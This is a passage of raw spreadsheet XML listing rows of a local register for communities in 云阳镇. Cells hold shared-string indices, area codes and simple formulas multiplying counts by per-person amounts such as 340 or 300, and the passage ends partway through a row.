    <row r="1657" ht="23" customHeight="1" spans="1:11">
      <c r="A1657" s="13" t="s">
        <v>4432</v>
      </c>
      <c r="B1657" s="14" t="str">
        <f>B1656</f>
        <v>云阳镇</v>
      </c>
      <c r="C1657" s="14" t="str">
        <f>C1656</f>
        <v>小关社区</v>
      </c>
      <c r="D1657" s="27" t="s">
        <v>4433</v>
      </c>
      <c r="E1657" s="27" t="s">
        <v>4434</v>
      </c>
      <c r="F1657" s="14" t="str">
        <f>F1656</f>
        <v>4113210521</v>
      </c>
      <c r="G1657" s="14"/>
      <c r="H1657" s="14"/>
      <c r="I1657" s="14"/>
      <c r="J1657" s="14"/>
      <c r="K1657" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1658" ht="23" customHeight="1" spans="1:11">
      <c r="A1658" s="13" t="s">
        <v>4435</v>
      </c>
      <c r="B1658" s="14" t="str">
        <f>B1657</f>
        <v>云阳镇</v>
      </c>
      <c r="C1658" s="14" t="str">
        <f>C1657</f>
        <v>小关社区</v>
      </c>
      <c r="D1658" s="27" t="s">
        <v>4436</v>
      </c>
      <c r="E1658" s="27" t="s">
        <v>2787</v>
      </c>
      <c r="F1658" s="14" t="str">
        <f>F1657</f>
        <v>4113210521</v>
      </c>
      <c r="G1658" s="14"/>
      <c r="H1658" s="14"/>
      <c r="I1658" s="14"/>
      <c r="J1658" s="14"/>
      <c r="K1658" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1659" ht="23" customHeight="1" spans="1:11">
      <c r="A1659" s="13" t="s">
        <v>4437</v>
      </c>
      <c r="B1659" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1659" s="14" t="s">
        <v>4403</v>
      </c>
      <c r="D1659" s="14" t="s">
        <v>4438</v>
      </c>
      <c r="E1659" s="14" t="s">
        <v>428</v>
      </c>
      <c r="F1659" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1659" s="14">
        <v>1</v>
      </c>
      <c r="H1659" s="14">
        <v>340</v>
      </c>
      <c r="I1659" s="14">
        <f>H1659*G1659</f>
        <v>340</v>
      </c>
      <c r="J1659" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1659" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1660" ht="23" customHeight="1" spans="1:11">
      <c r="A1660" s="13" t="s">
        <v>4439</v>
      </c>
      <c r="B1660" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1660" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1660" s="14" t="s">
        <v>4440</v>
      </c>
      <c r="E1660" s="14" t="s">
        <v>4441</v>
      </c>
      <c r="F1660" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1660" s="14">
        <v>2</v>
      </c>
      <c r="H1660" s="14">
        <v>300</v>
      </c>
      <c r="I1660" s="14">
        <f>H1660*G1660</f>
        <v>600</v>
      </c>
      <c r="J1660" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1660" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1661" ht="23" customHeight="1" spans="1:11">
      <c r="A1661" s="13" t="s">
        <v>4442</v>
      </c>
      <c r="B1661" s="14" t="str">
        <f>B1660</f>
        <v>云阳镇</v>
      </c>
      <c r="C1661" s="14" t="str">
        <f>C1660</f>
        <v>大关居委会</v>
      </c>
      <c r="D1661" s="13" t="s">
        <v>4443</v>
      </c>
      <c r="E1661" s="13" t="s">
        <v>4444</v>
      </c>
      <c r="F1661" s="14" t="str">
        <f>F1660</f>
        <v>4113210522</v>
      </c>
      <c r="G1661" s="14"/>
      <c r="H1661" s="14"/>
      <c r="I1661" s="14"/>
      <c r="J1661" s="14"/>
      <c r="K1661" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1662" ht="23" customHeight="1" spans="1:11">
      <c r="A1662" s="13" t="s">
        <v>4445</v>
      </c>
      <c r="B1662" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1662" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1662" s="14" t="s">
        <v>4446</v>
      </c>
      <c r="E1662" s="14" t="s">
        <v>4447</v>
      </c>
      <c r="F1662" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1662" s="14">
        <v>1</v>
      </c>
      <c r="H1662" s="14">
        <v>340</v>
      </c>
      <c r="I1662" s="14">
        <f t="shared" ref="I1662:I1671" si="87">H1662*G1662</f>
        <v>340</v>
      </c>
      <c r="J1662" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1662" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1663" ht="23" customHeight="1" spans="1:11">
      <c r="A1663" s="13" t="s">
        <v>4448</v>
      </c>
      <c r="B1663" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1663" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1663" s="14" t="s">
        <v>4449</v>
      </c>
      <c r="E1663" s="14" t="s">
        <v>3730</v>
      </c>
      <c r="F1663" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1663" s="14">
        <v>1</v>
      </c>
      <c r="H1663" s="14">
        <v>340</v>
      </c>
      <c r="I1663" s="14">
        <f t="shared" si="87"/>
        <v>340</v>
      </c>
      <c r="J1663" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1663" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1664" ht="23" customHeight="1" spans="1:11">
      <c r="A1664" s="13" t="s">
        <v>4450</v>
      </c>
      <c r="B1664" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1664" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1664" s="14" t="s">
        <v>4451</v>
      </c>
      <c r="E1664" s="14" t="s">
        <v>4452</v>
      </c>
      <c r="F1664" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1664" s="14">
        <v>1</v>
      </c>
      <c r="H1664" s="14">
        <v>340</v>
      </c>
      <c r="I1664" s="14">
        <f t="shared" si="87"/>
        <v>340</v>
      </c>
      <c r="J1664" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1664" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1665" ht="23" customHeight="1" spans="1:11">
      <c r="A1665" s="13" t="s">
        <v>4453</v>
      </c>
      <c r="B1665" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1665" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1665" s="14" t="s">
        <v>4454</v>
      </c>
      <c r="E1665" s="14" t="s">
        <v>4006</v>
      </c>
      <c r="F1665" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1665" s="14">
        <v>1</v>
      </c>
      <c r="H1665" s="14">
        <v>340</v>
      </c>
      <c r="I1665" s="14">
        <f t="shared" si="87"/>
        <v>340</v>
      </c>
      <c r="J1665" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1665" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1666" ht="23" customHeight="1" spans="1:11">
      <c r="A1666" s="13" t="s">
        <v>4455</v>
      </c>
      <c r="B1666" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1666" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1666" s="14" t="s">
        <v>4456</v>
      </c>
      <c r="E1666" s="14" t="s">
        <v>2305</v>
      </c>
      <c r="F1666" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1666" s="14">
        <v>1</v>
      </c>
      <c r="H1666" s="14">
        <v>340</v>
      </c>
      <c r="I1666" s="14">
        <f t="shared" si="87"/>
        <v>340</v>
      </c>
      <c r="J1666" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1666" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1667" ht="23" customHeight="1" spans="1:11">
      <c r="A1667" s="13" t="s">
        <v>4457</v>
      </c>
      <c r="B1667" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1667" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1667" s="14" t="s">
        <v>4458</v>
      </c>
      <c r="E1667" s="14" t="s">
        <v>3794</v>
      </c>
      <c r="F1667" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1667" s="14">
        <v>1</v>
      </c>
      <c r="H1667" s="14">
        <v>340</v>
      </c>
      <c r="I1667" s="14">
        <f t="shared" si="87"/>
        <v>340</v>
      </c>
      <c r="J1667" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1667" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1668" ht="23" customHeight="1" spans="1:11">
      <c r="A1668" s="13" t="s">
        <v>4459</v>
      </c>
      <c r="B1668" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1668" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1668" s="14" t="s">
        <v>4460</v>
      </c>
      <c r="E1668" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F1668" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1668" s="14">
        <v>1</v>
      </c>
      <c r="H1668" s="14">
        <v>340</v>
      </c>
      <c r="I1668" s="14">
        <f t="shared" si="87"/>
        <v>340</v>
      </c>
      <c r="J1668" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1668" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1669" ht="23" customHeight="1" spans="1:11">
      <c r="A1669" s="13" t="s">
        <v>4461</v>
      </c>
      <c r="B1669" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1669" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1669" s="14" t="s">
        <v>4463</v>
      </c>
      <c r="E1669" s="14" t="s">
        <v>3952</v>
      </c>
      <c r="F1669" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1669" s="14">
        <v>2</v>
      </c>
      <c r="H1669" s="14">
        <v>300</v>
      </c>
      <c r="I1669" s="14">
        <f t="shared" si="87"/>
        <v>600</v>
      </c>
      <c r="J1669" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1669" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1670" ht="23" customHeight="1" spans="1:11">
      <c r="A1670" s="13" t="s">
        <v>4464</v>
      </c>
      <c r="B1670" s="14" t="str">
        <f>B1669</f>
        <v>云阳镇</v>
      </c>
      <c r="C1670" s="14" t="str">
        <f>C1669</f>
        <v>老城社区</v>
      </c>
      <c r="D1670" s="14" t="s">
        <v>4465</v>
      </c>
      <c r="E1670" s="13" t="s">
        <v>4466</v>
      </c>
      <c r="F1670" s="14" t="str">
        <f>F1669</f>
        <v>4113210523</v>
      </c>
      <c r="G1670" s="14"/>
      <c r="H1670" s="14"/>
      <c r="I1670" s="14"/>
      <c r="J1670" s="14"/>
      <c r="K1670" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1671" ht="23" customHeight="1" spans="1:11">
      <c r="A1671" s="13" t="s">
        <v>4467</v>
      </c>
      <c r="B1671" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1671" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1671" s="14" t="s">
        <v>4468</v>
      </c>
      <c r="E1671" s="14" t="s">
        <v>3805</v>
      </c>
      <c r="F1671" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1671" s="14">
        <v>1</v>
      </c>
      <c r="H1671" s="14">
        <v>340</v>
      </c>
      <c r="I1671" s="14">
        <f>H1671*G1671</f>
        <v>340</v>
      </c>
      <c r="J1671" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1671" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1672" ht="23" customHeight="1" spans="1:11">
      <c r="A1672" s="13" t="s">
        <v>4469</v>
      </c>
      <c r="B1672" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1672" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1672" s="14" t="s">
        <v>4470</v>
      </c>
      <c r="E1672" s="14" t="s">
        <v>3727</v>
      </c>
      <c r="F1672" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1672" s="14">
        <v>3</v>
      </c>
      <c r="H1672" s="14">
        <v>265</v>
      </c>
      <c r="I1672" s="14">
        <f>H1672*G1672</f>
        <v>795</v>
      </c>
      <c r="J1672" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1672" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1673" ht="23" customHeight="1" spans="1:11">
      <c r="A1673" s="13" t="s">
        <v>4471</v>
      </c>
      <c r="B1673" s="14" t="str">
        <f>B1672</f>
        <v>云阳镇</v>
      </c>
      <c r="C1673" s="14" t="str">
        <f>C1672</f>
        <v>老城社区</v>
      </c>
      <c r="D1673" s="14" t="s">
        <v>4472</v>
      </c>
      <c r="E1673" s="13" t="s">
        <v>4077</v>
      </c>
      <c r="F1673" s="14" t="str">
        <f>F1672</f>
        <v>4113210523</v>
      </c>
      <c r="G1673" s="14"/>
      <c r="H1673" s="14"/>
      <c r="I1673" s="14"/>
      <c r="J1673" s="14"/>
      <c r="K1673" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1674" ht="23" customHeight="1" spans="1:11">
      <c r="A1674" s="13" t="s">
        <v>4473</v>
      </c>
      <c r="B1674" s="14" t="str">
        <f>B1673</f>
        <v>云阳镇</v>
      </c>
      <c r="C1674" s="14" t="str">
        <f>C1673</f>
        <v>老城社区</v>
      </c>
      <c r="D1674" s="44" t="s">
        <v>4474</v>
      </c>
      <c r="E1674" s="13" t="s">
        <v>4475</v>
      </c>
      <c r="F1674" s="14" t="str">
        <f>F1673</f>
        <v>4113210523</v>
      </c>
      <c r="G1674" s="14"/>
      <c r="H1674" s="14"/>
      <c r="I1674" s="14"/>
      <c r="J1674" s="14"/>
      <c r="K1674" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1675" ht="23" customHeight="1" spans="1:11">
      <c r="A1675" s="13" t="s">
        <v>4476</v>
      </c>
      <c r="B1675" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1675" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1675" s="14" t="s">
        <v>4477</v>
      </c>
      <c r="E1675" s="14" t="s">
        <v>4478</v>
      </c>
      <c r="F1675" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1675" s="14">
        <v>1</v>
      </c>
      <c r="H1675" s="14">
        <v>340</v>
      </c>
      <c r="I1675" s="14">
        <f t="shared" ref="I1675:I1680" si="88">H1675*G1675</f>
        <v>340</v>
      </c>
      <c r="J1675" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1675" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1676" ht="23" customHeight="1" spans="1:11">
      <c r="A1676" s="13" t="s">
        <v>4479</v>
      </c>
      <c r="B1676" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1676" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1676" s="14" t="s">
        <v>4480</v>
      </c>
      <c r="E1676" s="14" t="s">
        <v>4481</v>
      </c>
      <c r="F1676" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1676" s="14">
        <v>1</v>
      </c>
      <c r="H1676" s="14">
        <v>340</v>
      </c>
      <c r="I1676" s="14">
        <f t="shared" si="88"/>
        <v>340</v>
      </c>
      <c r="J1676" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1676" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1677" ht="23" customHeight="1" spans="1:11">
      <c r="A1677" s="13" t="s">
        <v>4482</v>
      </c>
      <c r="B1677" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1677" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1677" s="14" t="s">
        <v>4483</v>
      </c>
      <c r="E1677" s="14" t="s">
        <v>4484</v>
      </c>
      <c r="F1677" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1677" s="14">
        <v>1</v>
      </c>
      <c r="H1677" s="14">
        <v>340</v>
      </c>
      <c r="I1677" s="14">
        <f t="shared" si="88"/>
        <v>340</v>
      </c>
      <c r="J1677" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1677" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1678" ht="23" customHeight="1" spans="1:11">
      <c r="A1678" s="13" t="s">
        <v>4485</v>
      </c>
      <c r="B1678" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1678" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1678" s="14" t="s">
        <v>4486</v>
      </c>
      <c r="E1678" s="14" t="s">
        <v>4487</v>
      </c>
      <c r="F1678" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1678" s="14">
        <v>1</v>
      </c>
      <c r="H1678" s="14">
        <v>340</v>
      </c>
      <c r="I1678" s="14">
        <f t="shared" si="88"/>
        <v>340</v>
      </c>
      <c r="J1678" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1678" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1679" ht="23" customHeight="1" spans="1:11">
      <c r="A1679" s="13" t="s">
        <v>4488</v>
      </c>
      <c r="B1679" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1679" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1679" s="14" t="s">
        <v>4489</v>
      </c>
      <c r="E1679" s="14" t="s">
        <v>4490</v>
      </c>
      <c r="F1679" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1679" s="14">
        <v>1</v>
      </c>
      <c r="H1679" s="14">
        <v>340</v>
      </c>
      <c r="I1679" s="14">
        <f t="shared" si="88"/>
        <v>340</v>
      </c>
      <c r="J1679" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1679" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1680" ht="23" customHeight="1" spans="1:11">
      <c r="A1680" s="13" t="s">
        <v>4491</v>
      </c>
      <c r="B1680" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1680" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1680" s="14" t="s">
        <v>4492</v>
      </c>
      <c r="E1680" s="14" t="s">
        <v>3805</v>
      </c>
      <c r="F1680" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1680" s="14">
        <v>2</v>
      </c>
      <c r="H1680" s="14">
        <v>300</v>
      </c>
      <c r="I1680" s="14">
        <f t="shared" si="88"/>
        <v>600</v>
      </c>
      <c r="J1680" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1680" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1681" ht="23" customHeight="1" spans="1:11">
      <c r="A1681" s="13" t="s">
        <v>4493</v>
      </c>
      <c r="B1681" s="14" t="str">
        <f>B1680</f>
        <v>云阳镇</v>
      </c>
      <c r="C1681" s="14" t="str">
        <f>C1680</f>
        <v>老城社区</v>
      </c>
      <c r="D1681" s="18" t="s">
        <v>4494</v>
      </c>
      <c r="E1681" s="19" t="s">
        <v>4487</v>
      </c>
      <c r="F1681" s="14" t="str">
        <f>F1680</f>
        <v>4113210523</v>
      </c>
      <c r="G1681" s="14"/>
      <c r="H1681" s="14"/>
      <c r="I1681" s="14"/>
      <c r="J1681" s="14"/>
      <c r="K1681" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1682" ht="23" customHeight="1" spans="1:11">
      <c r="A1682" s="13" t="s">
        <v>4495</v>
      </c>
      <c r="B1682" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1682" s="14" t="s">
        <v>4298</v>
      </c>
      <c r="D1682" s="14" t="s">
        <v>4496</v>
      </c>
      <c r="E1682" s="14" t="s">
        <v>4497</v>
      </c>
      <c r="F1682" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1682" s="14">
        <v>1</v>
      </c>
      <c r="H1682" s="14">
        <v>340</v>
      </c>
      <c r="I1682" s="14">
        <f>H1682*G1682</f>
        <v>340</v>
      </c>
      <c r="J1682" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1682" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1683" ht="23" customHeight="1" spans="1:11">
      <c r="A1683" s="13" t="s">
        <v>4498</v>
      </c>
      <c r="B1683" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1683" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1683" s="14" t="s">
        <v>4499</v>
      </c>
      <c r="E1683" s="14" t="s">
        <v>4500</v>
      </c>
      <c r="F1683" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1683" s="14">
        <v>1</v>
      </c>
      <c r="H1683" s="14">
        <v>340</v>
      </c>
      <c r="I1683" s="14">
        <f>H1683*G1683</f>
        <v>340</v>
      </c>
      <c r="J1683" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1683" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1684" ht="23" customHeight="1" spans="1:11">
      <c r="A1684" s="13" t="s">
        <v>4501</v>
      </c>
      <c r="B1684" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1684" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1684" s="14" t="s">
        <v>4502</v>
      </c>
      <c r="E1684" s="14" t="s">
        <v>4503</v>
      </c>
      <c r="F1684" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1684" s="14">
        <v>2</v>
      </c>
      <c r="H1684" s="14">
        <v>300</v>
      </c>
      <c r="I1684" s="14">
        <f>H1684*G1684</f>
        <v>600</v>
      </c>
      <c r="J1684" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1684" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1685" ht="23" customHeight="1" spans="1:11">
      <c r="A1685" s="13" t="s">
        <v>4504</v>
      </c>
      <c r="B1685" s="14" t="str">
        <f>B1684</f>
        <v>云阳镇</v>
      </c>
      <c r="C1685" s="14" t="str">
        <f>C1684</f>
        <v>老城社区</v>
      </c>
      <c r="D1685" s="14" t="s">
        <v>4505</v>
      </c>
      <c r="E1685" s="13" t="s">
        <v>4506</v>
      </c>
      <c r="F1685" s="14" t="str">
        <f>F1684</f>
        <v>4113210523</v>
      </c>
      <c r="G1685" s="14"/>
      <c r="H1685" s="14"/>
      <c r="I1685" s="14"/>
      <c r="J1685" s="14"/>
      <c r="K1685" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1686" ht="23" customHeight="1" spans="1:11">
      <c r="A1686" s="13" t="s">
        <v>4507</v>
      </c>
      <c r="B1686" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1686" s="14" t="s">
        <v>4462</v>
      </c>
      <c r="D1686" s="14" t="s">
        <v>4508</v>
      </c>
      <c r="E1686" s="14" t="s">
        <v>4067</v>
      </c>
      <c r="F1686" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1686" s="14">
        <v>1</v>
      </c>
      <c r="H1686" s="14">
        <v>340</v>
      </c>
      <c r="I1686" s="14">
        <f>H1686*G1686</f>
        <v>340</v>
      </c>
      <c r="J1686" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1686" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1687" ht="23" customHeight="1" spans="1:11">
      <c r="A1687" s="13" t="s">
        <v>4509</v>
      </c>
      <c r="B1687" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1687" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1687" s="14" t="s">
        <v>4511</v>
      </c>
      <c r="E1687" s="14" t="s">
        <v>4512</v>
      </c>
      <c r="F1687" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1687" s="14">
        <v>1</v>
      </c>
      <c r="H1687" s="14">
        <v>340</v>
      </c>
      <c r="I1687" s="14">
        <f>H1687*G1687</f>
        <v>340</v>
      </c>
      <c r="J1687" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1687" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1688" ht="23" customHeight="1" spans="1:11">
      <c r="A1688" s="13" t="s">
        <v>4513</v>
      </c>
      <c r="B1688" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1688" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1688" s="14" t="s">
        <v>4514</v>
      </c>
      <c r="E1688" s="14" t="s">
        <v>4515</v>
      </c>
      <c r="F1688" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1688" s="14">
        <v>2</v>
      </c>
      <c r="H1688" s="14">
        <v>300</v>
      </c>
      <c r="I1688" s="14">
        <f>H1688*G1688</f>
        <v>600</v>
      </c>
      <c r="J1688" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1688" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1689" ht="23" customHeight="1" spans="1:11">
      <c r="A1689" s="13" t="s">
        <v>4516</v>
      </c>
      <c r="B1689" s="14" t="str">
        <f>B1688</f>
        <v>云阳镇</v>
      </c>
      <c r="C1689" s="14" t="str">
        <f>C1688</f>
        <v>云钢社区</v>
      </c>
      <c r="D1689" s="45" t="s">
        <v>4517</v>
      </c>
      <c r="E1689" s="45" t="s">
        <v>4518</v>
      </c>
      <c r="F1689" s="14" t="str">
        <f>F1688</f>
        <v>4113210599</v>
      </c>
      <c r="G1689" s="14"/>
      <c r="H1689" s="14"/>
      <c r="I1689" s="14"/>
      <c r="J1689" s="14"/>
      <c r="K1689" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1690" ht="23" customHeight="1" spans="1:11">
      <c r="A1690" s="13" t="s">
        <v>4519</v>
      </c>
      <c r="B1690" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1690" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1690" s="14" t="s">
        <v>4125</v>
      </c>
      <c r="E1690" s="14" t="s">
        <v>4520</v>
      </c>
      <c r="F1690" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1690" s="14">
        <v>1</v>
      </c>
      <c r="H1690" s="14">
        <v>340</v>
      </c>
      <c r="I1690" s="14">
        <f t="shared" ref="I1690:I1695" si="89">H1690*G1690</f>
        <v>340</v>
      </c>
      <c r="J1690" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1690" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1691" ht="23" customHeight="1" spans="1:11">
      <c r="A1691" s="13" t="s">
        <v>4521</v>
      </c>
      <c r="B1691" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1691" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1691" s="14" t="s">
        <v>4522</v>
      </c>
      <c r="E1691" s="14" t="s">
        <v>4523</v>
      </c>
      <c r="F1691" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1691" s="14">
        <v>1</v>
      </c>
      <c r="H1691" s="14">
        <v>340</v>
      </c>
      <c r="I1691" s="14">
        <f t="shared" si="89"/>
        <v>340</v>
      </c>
      <c r="J1691" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1691" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1692" ht="23" customHeight="1" spans="1:11">
      <c r="A1692" s="13" t="s">
        <v>4524</v>
      </c>
      <c r="B1692" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1692" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1692" s="14" t="s">
        <v>4525</v>
      </c>
      <c r="E1692" s="14" t="s">
        <v>4526</v>
      </c>
      <c r="F1692" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1692" s="14">
        <v>1</v>
      </c>
      <c r="H1692" s="14">
        <v>340</v>
      </c>
      <c r="I1692" s="14">
        <f t="shared" si="89"/>
        <v>340</v>
      </c>
      <c r="J1692" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1692" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1693" ht="23" customHeight="1" spans="1:11">
      <c r="A1693" s="13" t="s">
        <v>4527</v>
      </c>
      <c r="B1693" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1693" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1693" s="14" t="s">
        <v>4528</v>
      </c>
      <c r="E1693" s="14" t="s">
        <v>4529</v>
      </c>
      <c r="F1693" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1693" s="14">
        <v>1</v>
      </c>
      <c r="H1693" s="14">
        <v>340</v>
      </c>
      <c r="I1693" s="14">
        <f t="shared" si="89"/>
        <v>340</v>
      </c>
      <c r="J1693" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1693" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1694" ht="23" customHeight="1" spans="1:11">
      <c r="A1694" s="13" t="s">
        <v>4530</v>
      </c>
      <c r="B1694" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1694" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1694" s="14" t="s">
        <v>1856</v>
      </c>
      <c r="E1694" s="14" t="s">
        <v>3841</v>
      </c>
      <c r="F1694" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1694" s="14">
        <v>1</v>
      </c>
      <c r="H1694" s="14">
        <v>340</v>
      </c>
      <c r="I1694" s="14">
        <f t="shared" si="89"/>
        <v>340</v>
      </c>
      <c r="J1694" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K1694" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1695" ht="23" customHeight="1" spans="1:11">
      <c r="A1695" s="13" t="s">
        <v>4531</v>
      </c>
      <c r="B1695" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1695" s="14" t="s">
        <v>4510</v>
      </c>
      <c r="D1695" s="14" t="s">
        <v>4532</v>
      </c>
      <c r="E1695" s="14" t="s">
